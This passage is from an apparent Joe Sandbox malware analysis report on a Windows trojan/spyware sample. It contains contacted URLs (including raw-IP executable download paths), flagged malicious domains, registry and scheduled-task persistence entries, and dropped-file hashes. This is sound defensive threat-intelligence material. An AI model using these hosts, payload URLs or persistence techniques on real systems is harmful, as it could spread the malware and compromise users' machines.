                                                                                                                                                                                                                                                                                                                            http://www.pmail.comC6dAUcOA6M.exe, C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002B55000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.00000000209D0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1540095281.0000000021EA2000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AA2000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021B3B000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1576898183.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 0000000B.00000000.1440342602.0000000000416000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                                                                                                                                                                                                                                                              http://r11.o.leNative_neworigin.exe, 0000000D.00000002.1789264560.0000000006AE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                http://ocsp.sectigo.com0C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                  http://18.141.10.107:80/qmpy/Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                    http://knjghuig.biz/Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                      http://54.244.188.177/ulvxycyjutwdmypqalg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                        http://54.244.188.177:80/sqxdgegqjrgdpvialg.exe, 00000011.00000003.1589672551.000000000065D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                            http://x1.c.lencr.org/0Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                              http://x1.i.lencr.org/0Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                http://www.autoitscript.com/autoit3/8alg.exe, 00000011.00000003.2668324932.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2653910451.0000000000BB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                  http://54.244.188.177/alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                                                                    165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    		myups.bizUnited States
                                                                                                                                                                                                                                                                                                                                                    		19574CSCUSfalse
                                                                                                                                                                                                                                                                                                                                                    3.254.94.185
                                                                                                                                                                                                                                                                                                                                                    		uaafd.bizUnited States
                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                    3.94.10.34
                                                                                                                                                                                                                                                                                                                                                    		ytctnunms.bizUnited States
                                                                                                                                                                                                                                                                                                                                                    		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                    34.246.200.160
                                                                                                                                                                                                                                                                                                                                                    		tbjrpv.bizUnited States
                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                    198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    		gxe0.comCanada
                                                                                                                                                                                                                                                                                                                                                    		20068HAWKHOSTCAtrue
                                                                                                                                                                                                                                                                                                                                                    172.234.222.143
                                                                                                                                                                                                                                                                                                                                                    		przvgke.bizUnited States
                                                                                                                                                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                                                                                    18.208.156.248
                                                                                                                                                                                                                                                                                                                                                    		gnqgo.bizUnited States
                                                                                                                                                                                                                                                                                                                                                    		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                    34.211.97.45
                                                                                                                                                                                                                                                                                                                                                    		vrrazpdh.bizUnited States
                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                    208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    		gytujflc.bizUnited States
                                                                                                                                                                                                                                                                                                                                                    		32748STEADFASTUSfalse
                                                                                                                                                                                                                                                                                                                                                    35.164.78.200
                                                                                                                                                                                                                                                                                                                                                    		nqwjmb.bizUnited States
                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                    172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    		fwiwk.bizUnited States
                                                                                                                                                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                                                                                    51.195.88.199
                                                                                                                                                                                                                                                                                                                                                    		s82.gocheapweb.comFrance
                                                                                                                                                                                                                                                                                                                                                    		16276OVHFRtrue
                                                                                                                                                                                                                                                                                                                                                    44.221.84.105
                                                                                                                                                                                                                                                                                                                                                    		hehckyov.bizUnited States
                                                                                                                                                                                                                                                                                                                                                    		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                    85.214.228.140
                                                                                                                                                                                                                                                                                                                                                    		dlynankz.bizGermany
                                                                                                                                                                                                                                                                                                                                                    		6724STRATOSTRATOAGDEfalse
                                                                                                                                                                                                                                                                                                                                                    54.244.188.177
                                                                                                                                                                                                                                                                                                                                                    		pywolwnvd.bizUnited States
                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                    13.251.16.150
                                                                                                                                                                                                                                                                                                                                                    		sxmiywsfv.bizUnited States
                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                    47.129.31.212
                                                                                                                                                                                                                                                                                                                                                    		xlfhhhm.bizCanada
                                                                                                                                                                                                                                                                                                                                                    		34533ESAMARA-ASRUfalse
                                                                                                                                                                                                                                                                                                                                                    18.246.231.120
                                                                                                                                                                                                                                                                                                                                                    		vyome.bizUnited States
                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                    104.26.13.205
                                                                                                                                                                                                                                                                                                                                                    		api.ipify.orgUnited States
                                                                                                                                                                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                    82.112.184.197
                                                                                                                                                                                                                                                                                                                                                    		vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                                                                                                                                                    		43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUtrue
                                                                                                                                                                                                                                                                                                                                                    18.141.10.107
                                                                                                                                                                                                                                                                                                                                                    		warkcdu.bizUnited States
                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02UStrue

                                                                                                                                                                                                                                                                                                                                                    Private

                                                                                                                                                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                                                                                                                                                    127.0.0.1

                                                                                                                                                                                                                                                                                                                                                    General Information

                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                                                                                    Analysis ID:1562865
                                                                                                                                                                                                                                                                                                                                                    Start date and time:2024-11-26 08:11:11 +01:00
                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                                                                    Overall analysis duration:0h 16m 58s
                                                                                                                                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                                                                    Number of analysed new started processes analysed:44
                                                                                                                                                                                                                                                                                                                                                    Number of new started drivers analysed:3
                                                                                                                                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                                                    Sample name:C6dAUcOA6M.exe
                                                                                                                                                                                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                                                                                                                                                                                    Original Sample Name:0161d30defee14b9bdac49068c63a344320c11330acdfc10952c025637684adb.exe
                                                                                                                                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                                                                                                                                    Classification:mal100.spre.troj.spyw.evad.winEXE@59/159@135/22
                                                                                                                                                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                                                                                                                                                    • Successful, ratio: 83.3%
                                                                                                                                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                                                                                                                                    • Successful, ratio: 88%
                                                                                                                                                                                                                                                                                                                                                    • Number of executed functions: 83
                                                                                                                                                                                                                                                                                                                                                    • Number of non-executed functions: 179
                                                                                                                                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                                                                                    • Execution Graph export aborted for target Trading_AIBot.exe, PID 2112 because it is empty
                                                                                                                                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                                                                                                                                                    02:12:08API Interceptor2x Sleep call for process: C6dAUcOA6M.exe modified
                                                                                                                                                                                                                                                                                                                                                    02:12:28API Interceptor3531569x Sleep call for process: Native_neworigin.exe modified
                                                                                                                                                                                                                                                                                                                                                    02:12:29API Interceptor27x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                                                                                                                    02:12:30API Interceptor61x Sleep call for process: alg.exe modified
                                                                                                                                                                                                                                                                                                                                                    02:12:37API Interceptor2x Sleep call for process: Juqmtmya.PIF modified
                                                                                                                                                                                                                                                                                                                                                    02:12:38API Interceptor16x Sleep call for process: aymtmquJ.pif modified
                                                                                                                                                                                                                                                                                                                                                    02:13:17API Interceptor1279724x Sleep call for process: apihost.exe modified
                                                                                                                                                                                                                                                                                                                                                    08:12:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
                                                                                                                                                                                                                                                                                                                                                    08:12:28Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                                                                                                                                                                                                                                    08:12:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
                                                                                                                                                                                                                                                                                                                                                    08:12:47AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                                                                                                                                                                    IPs

                                                                                                                                                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1353216
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.324385552269216
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:iC4VQjGARQNhiEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:iOCAR0iEsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:DFE1607CB39760308AC48379A10829AB
                                                                                                                                                                                                                                                                                                                                                    SHA1:048B3618187DE7A7EF63A4E001B9BA0F10554E75
                                                                                                                                                                                                                                                                                                                                                    SHA-256:ADF31A8B6B4718F31C0F2D9022F9686B8E306CF1BA7DFE32537C3E98D26CC4D2
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C9A45C490451F22181C3BC9503F76A238985A043855BC80EDD1B2787AE280B3D2A9E157EA23B73298C6FBC3115BD5CD460B78798A99F58ECDBE47F7272F1A453
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!.....6.......................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1294848
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2826902117364805
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:9NUpaKghnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9CMKghsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:86738F12220919378353F23229B3AF5D
                                                                                                                                                                                                                                                                                                                                                    SHA1:AFAFF69191B077DB08E25C36F9ADDE9D1AF1B808
                                                                                                                                                                                                                                                                                                                                                    SHA-256:300242A91DA6A65CBF31A4A08740F7F931290EF33844F4C13ACD5259009DCE52
                                                                                                                                                                                                                                                                                                                                                    SHA-512:2DC928919F3FF222D67DFE8EF63E28326833DEF223E4C431055D0B15C2CEF3163A145A2006580A4EE12C5BDD02AB945146165B5970C34A5322AA6E01481F74E3
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... ............................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1314304
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.274137182829345
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:VMEhwdbToXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:TKdHosqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:10D77573DF2C4EBCC9020AF28F430B43
                                                                                                                                                                                                                                                                                                                                                    SHA1:1AD3C6200B8EEBE354687725096CFA2FC940E892
                                                                                                                                                                                                                                                                                                                                                    SHA-256:44BC43B98BE8BCC3D4AB28E4881AA661695906B2A7C9768E4FD71DF319544CA7
                                                                                                                                                                                                                                                                                                                                                    SHA-512:7DF4C732BD661A46BDF3DD954F3E3FB2866B27E9EBA1E2BF22041DD6D92CB9F601B4482FC27B300D359BD01039D46F54CF0AEA600871090A0B053E5D449B3F27
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !......2.... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2203136
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.647031955361552
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:oK0eqkSR7Xgo4TiRPnLWvJsDmg27RnWGj:oK0pR7Xn4TiRCvJsD527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:3F6B2D875C9F894541659E9CFBCA65BB
                                                                                                                                                                                                                                                                                                                                                    SHA1:0EB6399EF9688E2322007E553546239AAF8C5087
                                                                                                                                                                                                                                                                                                                                                    SHA-256:048703B20684B049B7A53D06CBC638151E9AF5A8CCF65ACFE1D111CE103CABB1
                                                                                                                                                                                                                                                                                                                                                    SHA-512:9736D568932737B08506B7EB2779161C4770E538B5F09A5A1A190E906B26452EABCC4B03773D1826CDBA3D925FE4A79022121FE42A11CBE84791596E0F98A8FC
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@..........................."......g"..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2369024
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.565059226286503
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:EfYP1JsEDkSR7Xgo4TiRPnLWvJsDmg27RnWGj:kYPBR7Xn4TiRCvJsD527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:D8FB26AFE9F458B6CD8BB05771B90100
                                                                                                                                                                                                                                                                                                                                                    SHA1:317E6469ADAEEA8E23587446F86DDD3ED86222BA
                                                                                                                                                                                                                                                                                                                                                    SHA-256:0298E1BDDB319A411C2FB35399150DDE66FCA52AD26555ED5601150C67DCB4DC
                                                                                                                                                                                                                                                                                                                                                    SHA-512:9FFA04D4C3559015DC82E371BF3DEC82E42CDE09BC25E7180BDC701F3A6CDCEB1D0A28249514DC88B7EF8F9EA0EF540C99CF82F7519A2849ABBA0BC8C7D4DC74
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.....R:$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1245184
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.123559105076108
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:t62SYUcknnGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:qYUcknGsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:44BF8C231445C1790C896B524ADA4791
                                                                                                                                                                                                                                                                                                                                                    SHA1:75E2D343ECDDF31A790B1A419FE25BBDC350DFCD
                                                                                                                                                                                                                                                                                                                                                    SHA-256:F5BCD4A94F81E8AC79454FBF7F0D86C6BFFB48C9514EA7CFD4F576768BF5F1A8
                                                                                                                                                                                                                                                                                                                                                    SHA-512:53B04A0849DE464F9829D626FE48EAF236731E226A52A37513A0653DCCF585112113A1940B3F49EA2127613CA6AE7C7E7083BD0E34BD588C8263D8AC6148D4C5
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
